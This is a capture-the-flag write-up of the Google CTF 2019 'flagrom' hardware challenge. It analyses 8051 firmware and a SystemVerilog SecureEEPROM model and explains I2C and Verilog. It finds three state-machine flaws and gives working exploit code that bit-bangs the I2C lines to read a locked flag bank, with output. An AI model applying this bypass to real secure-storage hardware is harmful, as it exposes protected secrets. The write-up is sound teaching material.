ubuntu@ubuntu:~/ctfs/google2019/flagrom$ file firmware.8051 
firmware.8051: data

running file command does not yield any helpful hint here, so let’s take a hex-look (xxd firmware.8051 | less). We won’t show the hex-dump for brevity, but besides some hex-bytes which are probably 8051 code, we are being greeted with some strings:

ubuntu@ubuntu:~/ctfs/google2019/flagrom$ strings firmware.8051
`.t@/
`,t@/
[FW] Writing flag to SecureEEPROM...............
VERIFY FAIL
DONE
[FW] Securing SecureEEPROM flag banks...........
[FW] Removing flag from 8051 memory.............
Hello there.
[FW] Writing welcome message to SecureEEPROM....

These seem rather familiar… We just saw them being printed after we finished uploading our payload! Before we jump right in to IDA, there’s another file file we need to pay a visit to – firmware.c. Once you take a short glance at the code, it’s quickly apparent that these strings are present there as well, and we can carefully assume that the firmware.8051 file is in fact a 8051 compiled version for firmware.c. There’s no point in showing the whole source code here, so we’ll assume you have it handy, and elaborate where necessary.

main calls 4 functions:

  write_flag();
  secure_banks();
  remove_flag();
  write_welcome();

The names are pretty self-explanatory, so we’ll cover the important parts one by one.

write_flag

write_flag uses the seeprom_write_byte function:

void seeprom_write_byte(unsigned char addr, unsigned char value) {
  seeprom_wait_until_idle();

  I2C_ADDR = SEEPROM_I2C_ADDR_MEMORY;
  I2C_LENGTH = 2;
  I2C_ERROR_CODE = 0;
  I2C_DATA[0] = addr;
  I2C_DATA[1] = value;
  I2C_RW_MASK = 0b00;  // 2x Write Byte

  I2C_STATE = 1;
  seeprom_wait_until_idle();
}

The function has two arguments – one address byte, and one data byte. It then uses what seems like MMIO in the CPU, to communicate with an I2C controller, which in turn communicates with the SecureEEPROM. In case it isn’t clear:

|-----|   |----------------|   |---------|
| CPU |-->| I2C Controller |-->| SEEPROM |
|-----|   |----------------|   |---------|

(From now on we’ll use SecureEEPROM / SEEPROM interchangeably).

How do we know that?

  • The code specifically mentions I2C… πŸ™‚
  • The I2C_ADDR = SEEPROM_I2C_ADDR_MEMORY; line indicates we intend to communicate with the SEEPROM device.

If you are not familiar with I2C, you can refer to Appendix B of this write-up.

To clarify very briefly – you can imagine the I2C controller like a (very) small router. Multiple devices can be connected to it, and each device has an internal “I2C Address”. So when we want to communicate with device A, we need to specify “Talk to device A, Let him know that X”. Instead of using 4 bytes as IP addresses, it usually uses 7 bits for addressing, and one bit to specify write/read (0/1) operation. The communication is done on the I2C bus, which is simply 2 lines delivering a clock signal and data.

If we take a look at the beginning of the code, we can see these definitions:

// I2C-M module/chip control data structure.
__xdata __at(0xfe00) unsigned char I2C_ADDR; // 8-bit version.
__xdata __at(0xfe01) unsigned char I2C_LENGTH;  // At most 8 (excluding addr).
__xdata __at(0xfe02) unsigned char I2C_RW_MASK;  // 1 R, 0 W.
__xdata __at(0xfe03) unsigned char I2C_ERROR_CODE;  // 0 - no errors.
__xdata __at(0xfe08) unsigned char I2C_DATA[8];  // Don't repeat addr.
__sfr __at(0xfc) I2C_STATE;  // Read: 0 - idle, 1 - busy; Write: 1 - start

So indeed, an MMIO that provides an I2C communication interface.

In the seeprom_write_byte code, we specify that we want to communicate with the SEEPROM device (SEEPROM_I2C_ADDR_MEMORY), Writing 2 bytes to it – one address byte (I2C_DATA[0]), and one data byte (I2C_DATA[1]). Don’t let the various addresses confuse you! The I2C_ADDRESS is “package destination”, and the package contains I2C_DATA. Since our destination is an EEPROM device (a fancy name for storage device) – we want to let it know – go to your memory at address X (index), and write byte Y.

The other MMIO values are relatively self-explanatory:

  • I2C_LENGTH = 2; – We relay 2 bytes into the SEEPROM device
  • I2C_RW_MASK = 0b00; – We use the send operation twice to deliver data to the SEEPROM
  • I2C_STATE = 1; – Everything is ready to go – take the package and deliver it!

seeprom_wait_until_idle simply waits until the delivery operation is finished – the I2C controller changes the I2C_STATE back to 0 when it’s idle.

Back to write_flag – notice how it writes the flag:

seeprom_write_byte(64 + i, FLAG[i]);

The code writes the flag to the SEEPROM, starting at address 64, and the data written is taken from the “FLAG” global/MMIO –

__xdata __at(0xff00) unsigned char FLAG[0x100];

secure_banks

The next function main calls is secure_banks. It calls the seeprom_secure_banks like so:

seeprom_secure_banks(0b0010);  // Secure 64-byte bank with the flag.

The comment suggests the SEEPROM is divided into 64-byte storage banks – we’ll use that information later. Let’s take a look at what seeprom_secure_banks does:

void seeprom_secure_banks(unsigned char mask) {
  seeprom_wait_until_idle();

  I2C_ADDR = SEEPROM_I2C_ADDR_SECURE | (mask & 0b1111);
  I2C_LENGTH = 0;
  I2C_ERROR_CODE = 0;

  I2C_STATE = 1;
  seeprom_wait_until_idle();
}

This function seemingly addresses another device – SEEPROM_I2C_ADDR_SECURE (unlike the regular SEEPROM_I2C_ADDR_MEMORY), and the 4 lower bits are masked with our mask argument. The code does not seem to read or write anything from this device at all, so we can assume the mere action of “calling” this device does something – probably locks a bank to make it secure.. :).

The secure_banks function then attempts to verify it cannot read the flag it has just stored:

  // Verify that the flag can NOT be read.
  for (i = 0; FLAG[i] != '\0'; i++) {
    if (seeprom_read_byte(64 + i) == FLAG[i]) {
      print("VERIFY FAIL\n");
      POWEROFF = 1;
    }
  }

So this action has indeed secured the flag. In fact, it’s entire memory bank, starting at address 64, ending at 128 – since this a 64 byte bank. From the information we gathered so far, we can deduce there are 4 banks of 64-bytes each, every one of them can be secured individually. How do we know that?

  • The comment mentioned Secure 64-byte bank
  • The flag starts at address 64 (2nd bank), and the mask we provided to lock was 0010 – Second bit.

remove_flag & write_welcome

The rest of the code is relatively less interesting –
remove_flag removes the original flag from memory. This means the flag is still secure in the SEEPROM, but it is not available anymore in plain memory, nor it is possible to read it from the SEEPROM, since we secured the bank. This prevents an attempt to upload and execute 8051 code that will simply read the flag straight from memory, or attempt to read it from the SEEPROM.
write_welcome Simply writes a welcome message into the first SEEPROM bank (which is non-secure).

To sum everything up to this point – the firmware.c code does the following:

  • Reads a FLAG from some pre-mapped memory
  • Stores the flag in a SEEPROM bank using I2C
  • Secures the bank
  • Removes the FLAG from memroy

An alternative interface?

If we read the entire C code, 2 interesting MMIO addresses pop-up:

__sfr __at(0xfa) RAW_I2C_SCL;
__sfr __at(0xfb) RAW_I2C_SDA;

These provide access to the I2C controller clock and data lines. This is somewhat peculiar, as we already have a well-defined interface to communicate with the I2C controller. That’s our first clue – we can probably bit-bang these lines to communicate with the controller independently and hopefully break things.

In practice, this sort of mimics a scenario where an attacker has physical access to an I2C bus, something that is very well possible.

Analyzing flagrom & the challenge

Since we see the various strings from firmware.c being printed when running the flagrom file or connecting to the challenge server, we can assume it’s running this firmware somehow (it’s 8051, mind you – not x86).

Now let’s verify our assumptions with IDA:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    ...

  read_proof_of_work();
  read_usercode();
  read_firmware();
  read_flag();
  dev_i2c = seeprom_new(v3, 0LL);
  seeprom_write_scl(dev_i2c, 1LL);
  seeprom_write_sda(dev_i2c, 1LL);
  puts("Executing firmware...");
  emu8051::emu8051((emu8051 *)&v5);
  init_emu((emu8051 *)&v5);
  emu8051::mem_write(&v5, 3LL, 0LL, &firmware, 10000);
  emu8051::mem_write(&v5, 2LL, 0xFF00LL, &flag, 128LL);
  memset(&flag, 0, 0x80uLL);
  done_marker = 0;
  while ( !done_marker )
    emu8051::execute((emu8051 *)&v5, 1u);
  emu8051::~emu8051((emu8051 *)&v5);
  remove_flag();
  puts("Executing usercode...");
  emu8051::emu8051((emu8051 *)&v5);
  init_emu((emu8051 *)&v5);
  emu8051::mem_write(&v5, 3LL, 0LL, &usercode, 10000);
  v6 = 100000;
  done_marker = 0;
  for ( i = 0; i <= 99999 && !done_marker; ++i )
    emu8051::execute((emu8051 *)&v5, 1u);
  emu8051::~emu8051((emu8051 *)&v5);
  seeprom_free(dev_i2c);
  puts("\nClean exit.");
  return 0;
}

So flagrom does the following:

  • Reads the proof-of-work.
  • Reads the usercode (that’s the code we are being asked to upload).
  • Reads the firmware file. A sneak peek tells us it reads the firmware.8051 file.
  • Reads the flag. A sneak peek tells the local copy of the flag is different πŸ˜‰ – 0n the real server the flag is loaded here..
  • Starts the SEEPROM device. It does so by using Verilator. To quote the site – “Verilator compiles synthesizable SystemVerilog … into single- or multithreaded C++ or SystemC code”. So what probably happened is that seeprom.sv (which we know is SystemVerilog) was compiled with some magic powder to mimic a SEEPROM device in C code.
  • Initializes a 8051 emulator… Voila! Indeed 8051 CPU is being used here. The firmware is loaded into address 0 of the emulator, and the flag is loaded into address 0xFF00. If you’ll take a look back at FLAG definition in firmware.c – you’ll find it specifies __at(0xff00) – matching exactly the address where we see the flag is being written to.
  • Executes the original firmware.8051 file (which matches firmware.c)
  • Removes flag from memory, to make extra sure we don’t read the flag off the memory (even though the original firmware took care of it as well).
  • Executes the usercode which is supposed to be in 8051 assembly. This is where we go in, after the flag has been removed from plain memory and secured inside the SEEPROM.

At this point, we starting to grasp what is required of us. We have an example firmware.c file which we can start to modify, upload and execute to conduct experiments, and we know there’s a mysterious SEEPROM we need to haxx. It is very safe to assume we got the source code for the SEEPROM at seeprom.sv.

In case you want to play around and compile the firmware – this line should get you covered:

sdcc firmware.c -o firmware.o && objcopy -I ihex -O binary firmware.o my_firmware.8051

How does it work?

Analyzing SEEPROM implementation

As mentioned, SEEPROM is implemented in SystemVerilog. If you don’t know Verilog at all – we suggest reading Appendix A now, which attempts to explain Verilog using the seeprom.sv file.

A brief overview of code

Looking at the module, we see 4 lines – 3 input lines and 1 output line:

module seeprom (
  input i_clk,
  input logic i_i2c_scl,
  input logic i_i2c_sda,
  output logic o_i2c_sda
);
  • i_clk – This line receives master clock signal.
  • i_i2c_scl, i_i2c_sda – I2C bus input lines.
  • o_i2c_sda – I2C data output line.

So we know this module communicates using I2C. Coupled with our earlier knowledge about the challenge – it makes a lot of sense.

We’ll now explain the function of each of the various wires and registers in the module. Figuring this out takes some reading of the code (this process is not linear), but reading the code once you have reference is easier.

  • mem_storage – The actual storage;
  • mem_secure – 4 bits, probably the mask specifying whether a bank is secure or not;
  • i2c_address – Register containing the address we’re trying to write/read to/from
  • i2c_address_valid – Register specifying if the address is valid (???) – more on that, later ;).
  • i2c_address_secure, i2c_next_address_secure a wire, referring to the current/next bank mask, denoting if the address inside the i2c_address register is in a bank marked as secure.
  • i2c_address_bits, i2c_data_bits, i2c_control_bits – Counters, used to make sure we get 8 bits of data – and then operate.
  • i2c_control – A control byte – This register stores the first byte received from the I2C transaction, and is used to decide which action to perform.
  • i2c_control_prefix – The 4 msb of i2c_control. This yields the action we would like to perform – either I2C_CONTROL_EEPROM or I2C_CONTROL_SECURE – and conforms exactly to the 2 possibilities we saw earlier in firmware.c
  • i2c_data – A register used to store data for reading / writing bytes on the bus.
  • i2c_control_bank – The 4 lsb of i2c_control. When addressing I2C_CONTROL_SECURE this denotes which banks to lock. Again, this conforms exactly to the code found in seeprom_secure_banks.
  • i2c_control_rw – The lsb of i2c_control. When addressing I2C_CONTROL_EEPROM this denotes whether to do a write/read operation.

The next pieces of code that start with always_comb seem like some standard I2C bit bang / state entry, and do not contain any complicated logic. The only thing worth noting is that i2c_start and i2c_stop are controllable by setting the lines to a specific value. This will become useful later.

always_ff @(posedge i_clk) begin
  i2c_last_scl <= i_i2c_scl;
  i2c_last_sda <= i_i2c_sda;
end
always_comb begin
  if (i2c_scl_state == I2C_SCL_STABLE_HIGH) begin
    i2c_start = i2c_last_sda && !i_i2c_sda;
    i2c_stop = !i2c_last_sda && i_i2c_sda;
  end else begin
    i2c_start = 0;
    i2c_stop = 0;
  end
end

The actual interesting part of the code starts here:

always_ff @(posedge i_clk) begin
  ...
  case (i2c_state)
    I2C_IDLE: begin
      if (i2c_start) begin
        i2c_state <= I2C_START;
      end
    end
  ...

This is the core of the SEEPROM operation, and we want to analyze how it works and look for bugs.

Understanding SecureEEPROM operation

When developing in Verilog, we’re usually developing state-machines, that do specific tasks. When dealing with a state machine, it’s really helpful to draw a control-flow graph to start dissecting how it works. It also helps to spot potential problems. We know that the SEEPROM state machine has to perform an I2C operation, so I2C knowledge can greatly assist our understanding of what happens. Here’s a rough sketch of the SEEPROM state machine:

I2C_ACK  -\                                 [read 8 bits]    [send 8 bits]   [read 8 bits]     [read 8 bits]
I2C_NACK -----> I2C_IDLE -> I2C_START -> I2C_LOAD_CONTROL -|-> I2C_READ --> I2C_LOAD_ADDRESS -> I2C_WRITE --
                  ^              ^                         |      ^      |          ^                ^     |
                  |              |                         |      |-------          |                |------
i2c_stop ---------|   i2c_start -|                         -------------------------|

Missing here are transitions to ACK and NACK state, but almost every step in this chain can jump to ACK or NACK, if the action was valid or not. As mentioned, familiarity with I2C can be useful. If you are unfamiliar with I2C please refer to Appendix B.

Notice that i2c_stop and i2c_start operation can be triggered regardless of any previous state, by setting the bus lines to specific values.

Very simply – The I2C protocol looks like the following:
| ADDR | r/w | data |
| 7bit | 1bit | bytes.. |

As seen in firmware.c, we have 3 transaction types – which align with how the state machine operates:

  1. Write Data:
    The write operation consists of 1 control byte, 1 address byte, and variable number of data bytes:
           i2c_start    |      ADDR   | r/w |  |   Address to write (index) |  | Data |  | Data |  | Data |  | Data | | ... |
               |        |   1010000   |  0  |  |              64            |  |  A   |  |  A   |  |  A   |  |  A   | | ... |
               |        |        0xa0       |  |             0x40           |  | 0x41 |  | 0x41 |  | 0x41 |  | 0x41 | | ... |

IDLE  -->    START   -->   LOAD_CONTROL     --->        LOAD_ADDRESS      --->  WRITE                                         (`i2c_stop`) --> IDLE
  1. Secure Bank
    The secure bank operation consists of 1 control byte, which contains the “operation” and the mask. Somewhat less standard, but still works.
             i2c_start    |   ADDR   |  mask  |
                 |        |   0101   |  0010  |
                 |        |        0x52       | 

IDLE  -->      START   -->    LOAD_CONTROL              (`i2c_stop`)---> IDLE
  1. Read Data:
    The read operation is slightly more complicated – we send a 1 control byte to specify a write operation, writing an address to read from. Then, we send another control byte specifying we would like to perform a read operation. Afterwards we start reading bytes from the device.
             i2c_start    |      ADDR   | r/w |  |   Address to read (index)  |     i2c_start         |      ADDR   | r/w |  | Data | | Data | | Data | 
                 |        |   1010000   |  0  |  |              64            |          |            |   1010000   |  1  |  |  A   | |  A   | |  A   | 
                 |        |        0xa0       |  |             0x40           |          |            |        0xa1       |  | 0x41 | | 0x41 | | 0x41 | 

IDLE  -->      START   -->  LOAD_CONTROL      --->        LOAD_ADDRESS       --->      START   -->         LOAD_CONTROL   --->   READ                    (`i2c_stop`)--> IDLE

Things to notice:

  • We always start the operation by bit-banging to i2c_start. This sets i2c_start to 1 and starts the state machine operation.
  • A responsible user, should trigger the i2c_stop on the bus, once an operation is finished, to get the device back to an IDLE state properly.
  • The read operation is broken into 2 parts, which are seperated by sending the I2C_START operation again.

Looking for bugs…

We now have a relatively good understand of how every operation of the state machine is supposed to work. So where does it fail? Reminder: we need to bypass the security checks to read from a secure bank.

Bug #1 – A weird read

Once a bank is set as secured, it cannot be unset (follow the mem_secure assignments – you’ll see). So how is the security being enforced? The obvious place to look is the read operation:

...
i2c_data_bits <= 0;
if (i2c_address_secure == i2c_next_address_secure) begin
  `DEBUG_DISPLAY(("READ: i2c_address = 0x%x", i2c_address));
  i2c_address <= i2c_address + 1;
  i2c_state <= I2C_ACK_THEN_READ;
end else begin
  i2c_state <= I2C_NACK;
end
...

But it’s not quite the security check we’re looking for. The only thing the read operation verifies is that the current address security level is the same as the next address security level. This means we cannot start a read operation in a non-secure bank, and keep reading bytes into a secure bank (because address #63 security level does not match address #64 security level). If there’s a difference between the current address security level and the next one – we’ll get a NACK, and the read operation will cease.

But what if we could somehow reach this state with a secure i2c_address? The condition would still be satisfied between address #64 and #65. We would probably be able to read from secure memory – nothing stops us from doing that. That’s bug #1.

Bug #2 – Don’t stop till you get enough

How do we provide i2c_address with a secure address? i2c_address is being set in the I2C_LOAD_CONTROL operation, so let’s take a look at it:

I2C_LOAD_ADDRESS: begin
  ...
  if (i2c_address_bits == 8) begin
    if (i2c_address_secure) begin
      i2c_address_valid <= 0;
      i2c_state <= I2C_NACK;
    end else begin
      i2c_data_bits <= 0;
      i2c_address_valid <= 1;
      i2c_state <= I2C_ACK_THEN_WRITE;
    end
  end else if (i2c_scl_state == I2C_SCL_RISING) begin
    i2c_address <= {i2c_address[6:0], i_i2c_sda};
    i2c_address_bits <= i2c_address_bits + 1;
  end
end

When loading 8 bits specifying an address, a check is being made. If the address is secure, we set the i2c_address_valid register to 0 – this address is invalid for either reading or writing. Otherwise, it’s kosher and i2c_address_valid is set to 1. So we cannot just load a secure address and ask the SEEPROM to start spilling the beans.
i2c_address_valid is also being set to 0 once we specify i2c_stop. This makes sense, as it re-initializes the register. But who says we have to play nice and specify an i2c_stop operation?

If we avoid using stop, we might be able to keep the i2c_address_valid set to 1, possibly reading some secure bytes. That’s bug #2.

Bug #3 – Read & Lock

i2c_address is either being set in an I2C_LOAD_ADDRESS operation, or when reading/writing. When we read 1 byte, SEEPROM promotes i2c_address by 1 so we’ll be able to read the next byte, immediately, without specifically addressing it again. This allows us to read multiple bytes in a row. But like we’ve already seen – the i2c_address is not being evaluated to make sure it’s valid, or secure. Only that it’s security level matches the next security level.

So what happens if we start reading a non-secure bank, at some point set this bank as secure, and continue reading? Will the security of the current address get re-evaluated? The answer is surprisingly no, and that’s bug #3.

We can start reading a non-secure bank, set it as secure, and continue the read operation – since the i2c_address validity does not necessarily get re-evaluated.

Chaining everything together

To sum everything up, here’s the operation we want to pull of, with the accomodating explanation.

Reminder: The flag is present in the 2nd bank, which should allow us to start reading the first, non-secure bank, and overflow into the 2nd, secure bank. Here’s how:

  • Start a regular read operation at address 62:
  • I2C_LOAD_CONTROL (I2C_CONTROL_EEPROM | 0):
    • i2c_control_prefix is equal to I2C_CONTROL_EEPROM:
      • i2c_control_rw is set to 0 (write) -> goto I2C_LOAD_ADDRESS
  • I2C_LOAD_ADDRESS (61):
    • i2c_address_secure is 0 (this address is not in a secure bank):
      • set i2c_address_valid to 1
  • I2C_START -> I2C_LOAD_CONTROL
  • I2C_LOAD_CONTROL (I2C_CONTROL_EEPROM | 1):
    • i2c_control_prefix is equal to I2C_CONTROL_EEPROM:
      • i2c_control_rw is set to 1 (read):
        • i2c_address_valid is set to 1 -> goto I2C_ACK_THEN_READ
  • I2C_READ … read 1 byte
    • i2c_address++
  • I2C_START -> I2C_LOAD_CONTROL
  • I2C_LOAD_CONTROL (I2C_CONTROL_SECURE | 0b0001):
    • i2c_control_prefix is equal to I2C_CONTROL_SECURE:
      • OR mem_secure with mask – 0b0001 (i2c_control_bank) => mem_secure now has the value 0b0011
    (BUG – should’ve re-evaluated i2c_address_valid)
  • I2C_START -> I2C_LOAD_CONTROL (BUG – we didn’t call stop, i2c_address_valid is not zeroed)
  • I2C_LOAD_CONTROL (I2C_CONTROL_EEPROM | 1):
    • i2c_control_prefix is equal to I2C_CONTROL_EEPROM:
      • i2c_control_rw is set to 1 (read):
        • i2c_address_valid is set to 1 -> goto I2C_ACK_THEN_READ
  • I2C_READ … read as many bytes as you want from secure memory banks!
    • i2c_address++ …
    (BUG – READ only checks current address security (e.g. 62), equals to the next (e.g. 63). They’re both 1, meaning secure, meaning read == FAIL).

Implementing an attack

We now have full understanding of the bug, and an idea how to exploit it. But we’re not quite there yet – how exactly do we send these commands to the I2C controller? RAW_I2C_SCL and RAW_I2C_SDA to the rescue!
Instead of communicating through the “proper channels”, we are going to bit-bang the I2C protocol ourselves on the bus, just like an attacker with physical access would.

Bit-banging

So how do we pull off this bit-banging? Conveniently, Looking in IDA on the flagrom binary, we can spot functions that implement the I2C controller. It provides an example how to do just that. Shown below are the relevant functions:

__int64 __fastcall send_start(__int64 a1)
{
  seeprom_write_scl(a1, 0LL);
  seeprom_write_sda(a1, 1LL);
  seeprom_write_scl(a1, 1LL);
  return seeprom_write_sda(a1, 0LL);
}

__int64 __fastcall send_byte(__int64 a1, unsigned int a2)
{
  __int64 result; // rax@1
  signed int i; // [rsp+1Ch] [rbp-4h]@1

  result = a2;
  for ( i = 0; i <= 7; ++i )
  {
    seeprom_write_scl(a1, 0LL);
    seeprom_write_sda(a1, (((signed int)(unsigned __int8)a2 >> (7 - i)) & 1) != 0);
    result = seeprom_write_scl(a1, 1LL);
  }
  return result;
}

__int64 __fastcall recv_byte(__int64 a1)
{
  signed int i; // [rsp+18h] [rbp-18h]@1
  unsigned __int8 v3; // [rsp+1Fh] [rbp-11h]@1

  v3 = 0;
  for ( i = 0; i <= 7; ++i )
  {
    seeprom_write_scl(a1, 0LL);
    seeprom_write_scl(a1, 1LL);
    v3 = 2 * v3 | seeprom_read_sda(a1);
  }
  return v3;
}

__int64 __fastcall recv_ack(__int64 a1)
{
  int v1; // eax@1

  seeprom_write_scl(a1, 0LL);
  seeprom_write_scl(a1, 1LL);
  LOBYTE(v1) = seeprom_read_sda(a1);
  return v1 ^ 1u;
}

And this is how the implementaion in our exploit.c looks like:

unsigned char bitbang_recv_byte() {
  int i;
  char c;
  for (i = 0; i<= 7; ++i) {
    RAW_I2C_SCL = 0;
    RAW_I2C_SCL = 1;
    c = (c << 1) | RAW_I2C_SDA ;
  }
  return c;
}

void bitbang_send_byte(unsigned char data) {
  int i;
  for (i = 0; i<= 7; ++i) {
    RAW_I2C_SCL = 0;    
    RAW_I2C_SDA = ((data >> (7-i)) & 1);
    RAW_I2C_SCL = 1;
  }
}

char bitbang_recv_ack(void) {
  char val = 0;
  RAW_I2C_SCL = 0;
  RAW_I2C_SCL = 1;
  val = RAW_I2C_SDA ^ 1;
  return val;
}

void bitbang_start() {
   RAW_I2C_SCL = 0;
   RAW_I2C_SDA = 1;
   RAW_I2C_SCL = 1;
   RAW_I2C_SDA = 0;
}

Capture the Flag

We now have all the necessary primitives to conduct our attack. This is how it goes:

void bitbang_read_flag(unsigned char addr) {
  char c;
  int i = 0;
  // WRITE operation
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 0); 
  bitbang_recv_ack();

  //LOAD address
  bitbang_send_byte(addr);
  bitbang_recv_ack();

  // READ 1 byte
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 1); 
  bitbang_recv_ack();
  MYBUF[i] = bitbang_recv_byte();

  // SECURE address
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_SECURE | 0b0001);
  bitbang_recv_ack();

  // READ operation
  bitbang_start();
  bitbang_send_byte(SEEPROM_I2C_ADDR_MEMORY | 1);
  bitbang_recv_ack();

  // READ 64 bytes
  for (i=1; i<64; i++) {
    MYBUF[i] = bitbang_recv_byte();
    bitbang_recv_ack();
  }
}

//Prints a temporary 0x100 bytes buffer
void printMYBUFF()
{
  int i = 0;
  for(i=0; i<0x100; i++)
  {
    CHAROUT = MYBUF[i];
  }
}

void main(void) {
  int i;
  for (i = 0; i<0x100; ++i) {
    MYBUF[i] = 0x42;  
  }
  MYBUF[i] = 0;

  bitbang_read_flag(61);
  printMYBUFF();
  POWEROFF = 1;

}

…And with that, we’re finished! We can now grab the flag off the server.

Executing firmware...
[FW] Writing flag to SecureEEPROM...............DONE
[FW] Securing SecureEEPROM flag banks...........DONE
[FW] Removing flag from 8051 memory.............DONE
[FW] Writing welcome message to SecureEEPROM....DONE
Executing usercode...
\x00\x00\x00On the real server the flag is loaded here.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

Summary

This was a really nice challenge, which introduced cool HW exercises, in a comfortable SW environment. We hope to see more of these in the future :). Thanks again g00gle for the awesome CTF!

Even though the write-up is pretty “linear” in nature, it took us time figuring everything out, and we obviously made a lot of mistakes and guesses along the way… but that’s the fun part, isn’t it?

We hope that you’ve found this write-up educating, abd learned a little bit about HW, protocols, and analyzing Verilog code.

See you next year!

Appendix A. Verilog crash course using seeprom.sv example

The goal of this Appendix is not to make you Verilog expert, but rather provide you the minimal tools necessary to understand the seeprom.sv code. We won’t explain the whole code, just a few key examples taken from the code, which we believe will enable you to read the code yourself and understand its operation.

Verilog, unlike a programming language, is a hardware description language. This means it does not describe a program, but hardware. Hardware is made of wires, connecting point A to point B, logic gates – allowing us to implement some combinatorial logic, and flip-flops, allowing us to implement sequential logic.
Combinatorial logic happens at once (for the scope of our discussion). A circuit like A XOR B AND C is just some wires and gates connected together.
Sequential logic has a sense of time, and thus requires a clock. A register for example, stores or changes value over time.

In Verilog, we describe the logic we would like the hardware to perform. The code usually ends up as some state-machine, doing a specific task. There’s a nice reference slide here, and we’ll try to get you up to speed with the syntax, only to be able to read and understand the seeprom.sv operation – nothing more.

Let’s start with the module’s definition:

module seeprom (
  input i_clk,
  input logic i_i2c_scl,
  input logic i_i2c_sda,
  output logic o_i2c_sda
);

This section describes the circuit’s interface. Think of it as a black box that has input and output lines. Here we have 3 inputs and 1 output:

  • i_clk – This line receives master clock signal. This clock always ticks.
  • i_i2c_scl, i_i2c_sda – These lines are input lines representing data I2C clock line and I2C data line. The difference is that this clock has specific functions for I2C, while the previous one has to tick in order for the circuit to work.
  • o_i2c_sda – Data output line.
    We can only READ from an input line, and we can only WRITE to an output line.

All the rest of the logic defined in the file is internal logic inside the circuit.

Now let’s talk about the difference between wire and logic:

logic i2c_last_scl;
wire i2c_control_rw = i2c_control[0];
  • logic defines a register, which stores a value over time, and its value can change according to some logic.
  • wire defines a connection between A and B. In this example, i2c_control_rw is a wire, connected to the lsb of the i2c_control register.

Both registers, and wires, can have multiple bits, as shown in the examples below:

logic [3:0] mem_secure;
wire [3:0] i2c_control_bank = i2c_control[3:0];

In both these of examples, a 4-bit declaration is shown (0-3).

Now, how do we perform slightly more complicated logic than connecting some wires? That’s how:

always_ff @(posedge i_clk) begin
always_comb begin

An always clause specifies an action has to always take place, with respect to the operation. You can think of it like an endless loop. Either it’s a combinatorial operation (comb), or a sequential operation (ff – flip-flop). When specifying a sequential operation, we have to specify what’s the clock signal we evaluate – in this example – a tick is every positive edge of i_clk signal.

Assignments for wires and registers vary:

i2c_start = i2c_last_sda && !i_i2c_sda;
i2c_state <= I2C_START;

Pay attention that assigning value to a wire uses = while assigning to a register uses <=. We won’t explain the reason (you can look it up), only specify that the syntax is legal.

Finally, there’s another assignment syntax that’s worth explaining since it’s being used:

i2c_control <= {i2c_control[6:0], i_i2c_sda};

This line takes the 7 LSB of i2c_control (0-6) and one bit from i_i2c_sda and puts them back into i2c_control register. It’s equivalent to shifting the i2c_control bits left, and inserting one bit from i_i2c_sda.
This syntax is used a lot when we want to read a full byte from the data line, and then evalute its contents.

You should now have enough knowledge to be able to take on the seeprom.sv file on your own. We recommend breaking down the big loop and understand its operation properly.

Good luck!

Appendix B. I2C crash course

Intro

Very shortly, I2C is an inter-integrated chip bus – a protocol for different hardware components to communicate (e.g.: A CPU and an EEPROM). Since this protocol is about different hardware parts comunicating with one another, it has two lines: a clock line and a data line.

The clock line is used to synchronize the two components to read & write at agreed upon intervals, and the data line is used to send and receive the actual bits.

Bit Banging

There’s a really good description of the signaling part of the protocol here, and we encourage you to read it (just the protocol clause). It will help you understand how the “bit-banging” works – the process of sending bits from point A to point B.

Once you’ve wrapped your head around the protocol, it’s easy to understand this Verilog state machine code, present in seeprom.sv:

always_comb begin
  if (i2c_last_scl && i_i2c_scl) begin
    i2c_scl_state = I2C_SCL_STABLE_HIGH;
  end else if (!i2c_last_scl && !i_i2c_scl) begin
    i2c_scl_state = I2C_SCL_STABLE_LOW;
  end else if (i2c_last_scl && !i_i2c_scl) begin
    i2c_scl_state = I2C_SCL_FALLING;
  end else if (!i2c_last_scl && i_i2c_scl) begin
    i2c_scl_state = I2C_SCL_RISING;
  end
end

always_comb begin
  if (i2c_scl_state == I2C_SCL_STABLE_HIGH) begin
    i2c_start = i2c_last_sda && !i_i2c_sda;
    i2c_stop = !i2c_last_sda && i_i2c_sda;
  end else begin
    i2c_start = 0;
    i2c_stop = 0;
  end
end

This code shifts between the various states of I2C, according to the protocol. As an exercise, you can look at how the start & stop conditions are implemented, and see that they indeed match the definitions present in the provided link.
It’s also relatively easy to see that this logic does not seem to be flawed, and the bug is probably not present here.

The start signal signals the devices on the bus to get ready, for a transaction is about to take place. The stop signal, signals it’s finished. Transactions are answered with ACK/NACK, to signal if the requested operation was successful or not.

A little more logic

Now that you understand how the signaling (start, stop, send bit, receive bit) works, let’s talk about the logical level beyond the bits. There can be several different devices on the bus, and we want to be able to address different devices. Thus – the first byte we will transmit on the bus, will be the addressing byte. This byte is composed of 7 bits of address, and one bit that specifies the operation we would like to perform – either write (0) or read (1). For example:

|      ADDR   | r/w |
|   1010000   |  0  |
|        0xa0       |

The bits 0b10100000 (0xa0) means that we would like to perform a write operation to address 0x50.

Once we send the address bytes with the proper operation, we can start writing a message to the device, or receive data from it. It really depends how the device was implemented and what bytes it might expect or send. There are standards, but we will not elaborate about them in this scope.

|      ADDR   | r/w | |   DATA   | |  ...  |
|   1010000   |  0  | | 11111111 | |  ...  |
|        0xa0       | |   0xFF   | |  ...  |

I2C Controller

Writing C code to perform all this bit-banging process is a lot of work, and prone to errors. Instead, users who wish to communicate with other devices on the bus use an I2C controller. This is a device we can communicate with using a defined interface, which usually would be much easier, than having to implement the entire protocol. Simply state the address and data, and the I2C controller would deliver the data on the bus. Such controllers are very common, each having its own interface.

Summary

That’s about it – not too hard, and we spared you the uglier details. The key takeaways relevant for this exercise:

  • The bit-banging part in seeprom.sv seems solid – the problem is probably in the state-machine implementation (i.e. the protocol layer, not the signaling layer).
